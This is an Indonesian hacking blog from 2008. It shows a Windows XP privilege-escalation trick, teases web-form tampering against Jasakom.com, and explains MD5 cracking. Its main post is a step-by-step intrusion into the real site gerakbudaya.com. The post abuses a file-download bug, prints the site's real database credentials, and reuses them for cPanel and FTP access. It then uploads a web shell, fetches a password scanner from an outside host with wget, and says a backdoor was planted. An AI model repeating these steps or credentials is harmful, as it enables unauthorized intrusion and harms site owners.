Saturday, June 28, 2008

Menjadi System Pada Windows XP

Pada artikel yang saya buat ini, awalnya ketika saya menggunakan deep freeze saya melihat betapa hebatnya deep freeze v.6 yang mengaku dirinya sebagai system, secara tidak sengaja terlintas difikiran saya bagaimana caranya menjadi system seperti deep freeze yang mengaku dirinya mempunyai privilege pada Windows XP. Ok tehniknya cukup sampai disini, langsung aja saya akan menunjukkan bagaimana caranya menjadi system pada Windows XP.


Langkah pertama :


* Jalankan Command Prompt (DOS)

* Ketikkan perintah at 20:33 /interactive "cmd.exe"
* Ketikkan perintah at untuk melihat schedule task yang aktif

* Setelah command prompt-nya bertambah satu, maka

* Jalankan Windows Task Manager dengan menekan tombol ctrl + alt + delete
* Klik tab PROCESSES
* Matikan EXPLORER

* Tutup Windows Task Manager-nya
* Pada DOS yang terakhir terbuka ketikkan : EXPLORER

* Selamat, sekarang anda telah menjadi SYSTEM pada Windows XP

Selamat Mencoba!!!

Jasakom Attack

Untuk kali ini, saya ingin menunjukkan trik melakukan manipulasi data ke website Jasakom.com . Tools yang dibutuhkan ialah achilles atau bisa juga menggunakan addons firefox "tamper data" (Diajarin mas Rizki Wicaksono "Thank you"). Untuk tata cara penggunaan tools achilles bisa lihat disini "http://blog.360.yahoo.com/blog-faaDfjghaL.66FWYqQPtcpE3eg--?cq=1" (Mood == MaleZzZ).

Pada teknik Jasakom Attack 1 : Saya mencoba untuk memberikan nilai pada polling tanpa limit.
Pada teknik Jasakom Attack 2: Saya mencoba untuk memberikan komentar pada salah satu artikel "http://www.jasakom.com/index.php?categoryid=31&p2_articleid=628" di website Jasakom.com Dgn "USERNAME SIAPA SAJA" (Termasuk username admin).

Saya mendapatkan trik ini "Penggunaan Tools Achilles" dari buku mas S'to "http://www.jasakom.com/sto" yang berjudul Seni Internet Hacking ReCoded "http://www.jasakom.com/index.php?categoryid=15&p2_articleid=12". Jadi, bagi anda yg berminat lebih dalam lagi mempelajari teknik hacking ini silahkan beli bukunya di "http://www.jasakom.com/index.php?categoryid=15".

Saya mohon maaf yang sebesar- besarnya. Saya tidak menuliskan tata cara bagaimana melakukan manipulasi data terhadap website Jasakom.com. Alasannya sama seperti diatas (Mood == MaleZzZ).

Weitzzz...Jangan kecewa dulu. Anda tetap bisa menikmati teknik hacking ini, melalui video yang telah saya upload ke situs Youtube.com dan Indowebster.com.

Silahkan, lihat disini:
http://www.youtube.com/results?search_query=psychozetic&search_type=

Atau bisa download disini (Recomended):
http://www.indowebster.com/search.php?keyword=jasakom

Menembus Cpanel Situs Malaysia GerakBudaya.com

Ass wm wb...MERDEKA!!!!

Saya akan memberikan tutorial saya bagaimana menembus cpanel pada www.gerakbudaya.com, Mohon maaf jika tutorial ini agak panjang..karena saya mencoba membahas step-by-step

Awalnya saya mencari bugs fungsi get file, dan berharap semoga saja sang admin salah
mendeklarasikan fungsi, query, atau path-nya dengan cara googling keyword inurl:(fungsigetfile). Fungsi getfile disini adalah file php untuk memproses download file bisa berupa download.php, getfile.php, savefile.php, dseterusnya bisa kita kembangkan
sendiri kemungkinan2 yg ada. Bugs ini dapat menyebabkan kita bisa mendapatkan file2 php yg kita perlukan di dalam folder yg memiliki permission 777 atau 755


Seperti kita ketahui file php adalah file yang berisi bahasa pemrograman untuk memproses suat data, yang source codenya tidak bisa kita lihat langsung kecuali file php berada di dalam html

OK lanjut...

saya mendapatkan target: "www.gerakbudaya.com/store/download.php?filename="
ok jika menemukan target seperti ini test dulu apakah vurnerable atau tidak dengan cara tambahkan


pada string dibelakang file "download.php" sehinga url menjadi :
www.gerakbudaya.com/store/download.php?filename=download.php
jika berhasil mendownload file "download.php" bearti bugnya vurnerable dan bisa kita manfaatkan untuk
mengambil file2 php lainnya termasuk file php untuk proses login atau file php untuk menghubungkan ke database..

Pertama2 kita cari dulu page admin/login berada, caranya dengan mengira2 lokasi path adminnya (misal: /admin, /administrator, /login, /admin.php, /login.php, dst) atau bisa dengan "cgiscan"
Nah pada target ini saya menemukan pagenya di www.gerakbudaya.com/store/login.php (koq bisa nebak??
hehe kan udah ada linknya tinggal klik aja..;p) kalo login berupa form cari actionnya mengarah kemana
caranya mudah saja lihat source code dan cari kata2 action="", untuk target saya dapatkan diantara
script:

method="get">

Langkah selanjutnya download file "login.php" dengan memasukkan string pada bugs, sehingga url menjadi:
www.gerakbudaya.com/store/download.php?filename=login.php kemudian buka file "login.php" dengan notepad, cari
file prosesnya mengarah kemana..cari link file proses loginnya diantara kata2 includes atau required sebelum kata2 procces, untuk target saya dapatkan diantara script:
require('includes/application_top.php') --> artinya mengarah ke "/includes/application_top.php"
Download lagi file "/includes/application_top.php" dengan memasukkan string pada bugs, sehingga url
menjadi:
www.gerakbudaya.com/store/download.php?filename=includes/application_top.php

buka lagi file "aplication_top.php" dan cari lagi kata2 includes atau required, pada target saya
dapatkan :// include server parameters require('includes/configure.php');
---> artinya diproses oleh file "includes/configure.php"


Download file "includes/configure.php" tersebut dgn memasukkan string pada bugs, sehingga url menjadi:
www.gerakbudaya.com/store/download.php?filename=includes/configure.php
buka file tsb dan kita akan menemukan username database, password, dan database name. Pada target
saya temukan diantara script:
define('DB_SERVER_USERNAME', 'gerakbdy_geraksi');
define('DB_SERVER_PASSWORD', '79578342');
define('DB_DATABASE', 'gerakbdy_mainstore');


artinya:
database name=geraksi
database password=79578342
database username=gerakbdy_mainstore
username cpanel=gerakbdy
*catatan:username dan password digunakan pada database phpmyadmin bukan pada admin user dan admin
cpanel. okkk sampe sini istirahat dulu bentar, kalo udah lanjut lagi:

Control panel admin webmaster setahu saya ada dua jenis yaitu cpanel atau spanel, untuk login tinggal
menambah path /cpanel atau /spanel dibelakan domain..
untuk cpanel, login phpmyadmin terpadu didala cpanel sehingga kita masih harus login terlebih dahulu pada cpanel. Sedangkan pada spanel login filemanager dan phpmyadmin dipisahkan, sehingga kita bisa langsung masuk ke database phpmyadmin dgn
password dan username tadi tanpa harus login dulu ke panel admin..

Setelah saya mengecek whois domain, ternyata target menggunakan host civicbuilder.net yg menggunakan
cpanel11, skrg coba kita login ke cpanel-nya pada url:
www.gerakbudaya.com/cpanel ----> masukkan username
gerakbdy dan password kita coba dgn password database atau username database atau kata2 lain yg
kita dapatkan!!

*jika berhasil kita langsung dapat login ke filemanager


Kenapa pada password kita menggunakan pass db atau usrnm db, jawabannya simple karena psikologisnya,
admin webmaster biasanya tidak mau repot mengahapal sekian banyak password cpanel, database, webmail,
ftp, dl . Kalo belum berhasil login ke cpanel jgn gampang menyerah, kita coba dengan ftp, siapa tau kita bisa
masuk. Dengan cara berikut:
untuk tutorial ini penulis menggunakan mscmd pada

windows :
- buka cmd prompt ---> klik start->run->ketik "cmd"
- pada cmd prompt ketik "ftp gerakbudaya.com"
- kita akan ditanyakan username dan password, coba
masukkan pass dan usrnm db, siapa tau beruntung?
Dan ternyata anda benar " i'm login succesfully"




wuihhhhh..akhirnya
so selanjutnya apa?? yupz kita bisa langsung mengupload, mendownload, atau menghapus file, dll
perintah command ftp bisa kalian lihat di http://www.nsftools.com/tips/MSFTP.htm
Tapi gk seru ya kayaknya kalo gk dapet akses penuh ke cpanel..tenang ada caranya:
coba kita upload sebuah shell ke dalam server melaui ftp..
setalah berhasil buka file shell-nya dan set konfigurasi kalo udah login ke phpshell..masukkan file untuk scan password target (cari di google atau buat sendirilah...usaha yaaa),


caranya dengan perintah command linux:

"wget http://www.geocities.com/budak_dak_berez/scanpass.txt"
---> tanpa tanda kutip
kemudian rename file menjadi .php, caranya: ketik "mv scanpass.txt scanpass.php" ---> tanpa tanda kutip
ok sekarang coba jalankan file tersebut, dgn mengetikkan: "php scanpass.php" ---> tanpa tanda kutip
script akan scan semua user path yang memiliki config.php pada /home/ bukan /public_html/ atau wwwroot
gotchaaa...saya menemukan usrnm gerakbdy dengan pass 79578342

catatan: ini pun masih membutuhkan sebuah keberuntungan dengan shell ini saya pun berhasil mempertahankan
cpanel yg sempat diambil alih..namun setelah phpshel dan account ftp dihapus oleh webmaster saya hanya bisa gigit jari...;p
buat rekan yg lain yg mungkin bisa memanfaatkan dan mengembangkan celah ini..saya menanamkan sebuah bugs fungsi get file dgn url "www.gerakbudaya.com/bahaya.php?filename=" pass dan usrnm db telah diganti admin webmaster
menjadi:

username db: gerakbdy_geramm / geramm
password db:

Ok frenz lanjutkan perjuangan saya, karena saya mohon pamit dulu untuk mundur, segala yg mengatasnamakan budak^dak^berez pada aksi hacking, defacing, dll bukanlah saya yg melakukannya..
catatan terakhir: saya sangat sedih karena bugs ini banyak saya temukan pada situs2 indonesia, tolong di secure!!

Mohon maaf yg sebesar2nya jikalau ada kesalahan dan kekurangan pada tutorial ini, karena saya hanyalah manusia biasa

Wassallam wm wb..MERDEKAAAAAAAA!!!


Ingin belajar hacking silakan download ini


http://rapidshare.com/files/75661607/UltimateHacking2007.rar



Bagaimana Cara Cracking md5 ciphered text ??

LOGIKA :
md5 ( message digest 5 ) ituh adalah enkripsi one way hash yang artinya adalah plain text (text asli) yang sudah ter enkripsi tidak mungkin dikembalikan kedalam bentuk semula.

md5 ituh sebanyak apapun plaintextnya pasti akan dibikin menjadi 32 karakter terenkripsi , makanya sering md5 dibikin buat checksum atau pengecekan keabsahan suatu file karena satu karakter saja pun berubah , maka hasil md5nya juga akan berubah , walaupun sudah ditemukan kolisinya beberapa tahun yang lalu.

contoh :
plaintext : malcoder
ciphertext : 8c6d8aed6dc647db4e98ded91049e998

plaintext : apapunlah
ciphertext : 15cdd0fd997178efc32991ea5a5008ea

plaintext : a
ciphertext : 0cc175b9c0f1b6a831c399e269772661

itu membuktikan pernyataan diatas mengenai teori one way hash . Lalu bagaimana ?? kok bisa dicrack ?? khan gak bisa di decrypt....

caranya :
harus mengetahui dulu cara2 cracking password salah satunya bruteforce dan dictionary...
nah lalu kenapa bisa dicrack ??
yah dia bakal ngelakuin hal yang sama yaitu mencoba setiap kombinasi untuk yang bruteforce , dan ngelihat kamus pada metode dictionary...

TAPI.... bedanya sebelum melakukan pencocokan ama yang pengen dicrack , mesin mengenkripsi dulu kombinasi atau word dalam wordlistnya dictionary menjadi md5 .. baru setelah itu di cocokkan... selama belum diketemukan kecocokan , maka cracking berlanjut , dan jika udah diketemukan kecocokan , maka dia akan melihat..
"YANG MD5 INI PUNYA PLAINTEXT YANG MANA SIH??" nah akhirnya diketemukan plaintextnya...

binun ??? hehehe... yaudah saya jelaskan...

misalnya :

md5 yang pengen kita crack : 4a8a08f09d37b73795649038408b5f33

trus si mesin misalnya pake cara bruteforce , trus dia bikin kombinasi semua kemungkinan yang ada dan di encrypt ke md5:

plaintext | Ciphertext
a 0cc175b9c0f1b6a831c399e269772661 {== gak cocok
b 92eb5ffee6ae2fec3ad71c777531578f {== gak cocok
c 4a8a08f09d37b73795649038408b5f33 {== COCOK

setelah diketemukan mana yang cocok , maka akan dicari nih yang cocok yang punya siapa ??
dan diketahui yang punya adalah plaintext "c" berarti md5 yang pengen kita crack tadi text aslinya adalah "c"

CRACKED ... tugas selesaiii..

mudah2an bisa dimengerti...